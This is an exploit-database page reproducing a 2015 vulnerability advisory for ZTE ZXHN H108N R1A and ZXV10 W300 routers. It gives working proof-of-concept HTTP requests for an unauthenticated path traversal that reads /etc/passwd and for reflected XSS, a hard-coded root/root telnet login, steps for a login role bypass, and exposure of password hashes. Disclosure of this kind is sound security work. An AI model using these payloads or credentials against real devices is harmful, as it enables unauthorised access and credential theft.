Menu

Search for hundreds of thousands of exploits

"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities"

Author

Exploit author

"Karn Ganeshen"

Platform

Exploit platform

hardware

Release date

Exploit published date

2015-11-20

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
# Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple
vulnerabilities]
# Discovered by: Karn Ganeshen
# CERT VU# 391604
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported
# ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A
# ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE

Overview
ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10
W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.
*CVE-ID*:
CVE-2015-7248
CVE-2015-7249
CVE-2015-7250
CVE-2015-7251
CVE-2015-7252

*Note*: Large deployment size, primarily in Peru, used by TdP.

Description
*CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information
Exposure* - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain
credentials and other sensitive details about the ZXHN H108N R1A.
A. User names and password hashes can be viewed in the page source of
http://<IP>/cgi-bin/webproc

PoC:

Login Page source contents:

...snip....
//get user info
var G_UserInfo = new Array();
var m = 0;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "admin"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here
G_UserInfo[m][2] = "1"; //Level
G_UserInfo[m][3] = "1"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "user"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "2"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "support"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "3"; //Index
m++;
...snip...

B. The configuration file of the device contains usernames, passwords,
keys, and other values in plain text, which can be used by a user with
lower privileges to gain admin account access. This issue also affects ZTE
ZXV10 W300 models, version W300V1.0.0f_ER1_PE.


*CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper
Authorization* - CVE-2015-7249

By default, only admin may authenticate directly with the web
administration pages in the ZXHN H108N R1A. By manipulating parameters in
client-side requests, an attacker may authenticate as another existing
account, such as user or support, and may be able to perform actions
otherwise not allowed.

PoC 1:
1. Login page user drop-down option shows only admin only.
2. Use an intercepting proxy / Tamper Data - and intercept the Login submit
request.
3. Change the username admin to user / support and continue Login.
4. Application permits other users to log in to mgmt portal.

PoC 2:
After logging in as support, some functional options are visibly
restricted. Certain actions can still be performed by calling the url
directly. Application does not perform proper AuthZ checks.

Following poc is a change password link. It is accessible directly, though
it (correctly) is restricted to changing normal user (non-admin) password
only.

http://
<IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd

Other functions / pages may also be accessible to non-privileged users.


*CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper
Limitation of a Pathname to a Restricted Directory ('Path Traversal') *-
CVE-2015-7250

The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter
which takes an unrestricted file path as input, allowing an attacker to
read arbitrary files on the system.

Arbitrary files can be read off of the device. No authentication is
required to exploit this vulnerability.

PoC

HTTP POST request

POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177

getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj­
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a


HTTP Response

HTTP/1.0 200 OK
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=7ce7bd4a; expires=Fri, 31­Dec­9999 23:59:59
GMT;path=/

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


*CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of
Hard-coded Credentials* - CVE-2015-7251

In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible
using the hard-coded credentials 'root' for both the username and password.

*CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper
Neutralization of Input During Web Page Generation ('Cross-site
Scripting') *- CVE-2015-7252

In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is
vulnerable to reflected cross-site scripting [pre-authentication].

PoC

POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177

getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj­
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a



+++++
-- 
Best Regards,
Karn Ganeshen
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2016-08-01 "Halliburton LogView Pro 9.7.5 - '.cgm' / '.tif' / '.tiff' / '.tifh' Crash (PoC)" dos windows "Karn Ganeshen"
2016-07-29 "mySCADAPro 7 - Local Privilege Escalation" local windows "Karn Ganeshen"
2016-07-25 "Mediacoder 0.8.43.5852 - '.m3u' (SEH)" local windows "Karn Ganeshen"
2016-07-25 "CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)" local windows "Karn Ganeshen"
2016-07-21 "TFTP Server 1.4 - 'WRQ' Remote Buffer Overflow (Egghunter)" remote windows "Karn Ganeshen"
2016-07-06 "CIMA DocuClass ECM - Multiple Vulnerabilities" webapps php "Karn Ganeshen"
2016-05-17 "Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)" webapps multiple "Karn Ganeshen"
2016-03-03 "Schneider Electric SBO / AS - Multiple Vulnerabilities" remote hardware "Karn Ganeshen"
2016-02-04 "D-Link DVG­N5402SP - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2016-02-04 "GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2016-01-18 "SeaWell Networks Spectrum - Multiple Vulnerabilities" webapps php "Karn Ganeshen"
2015-11-20 "Cambium ePMP 1000 - Multiple Vulnerabilities" webapps cgi "Karn Ganeshen"
2015-11-20 "ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-11-20 "ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-15 "netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-15 "PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-14 "ZYXEL PMG5318-B20A - OS Command Injection" webapps hardware "Karn Ganeshen"
2015-10-13 "F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal" webapps hardware "Karn Ganeshen"
2015-10-13 "NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-01 "PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities" remote hardware "Karn Ganeshen"
2010-07-17 "EasyFTP Server 1.7.0.11 - 'LIST' (Authenticated) Remote Buffer Overflow" remote windows "Karn Ganeshen"
2010-07-17 "EasyFTP Server 1.7.0.11 - 'MKD' (Authenticated) Remote Buffer Overflow" remote windows "Karn Ganeshen"
2010-02-04 "Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting" remote hardware "Karn Ganeshen"
2009-06-28 "Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting" remote multiple "Karn Ganeshen" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected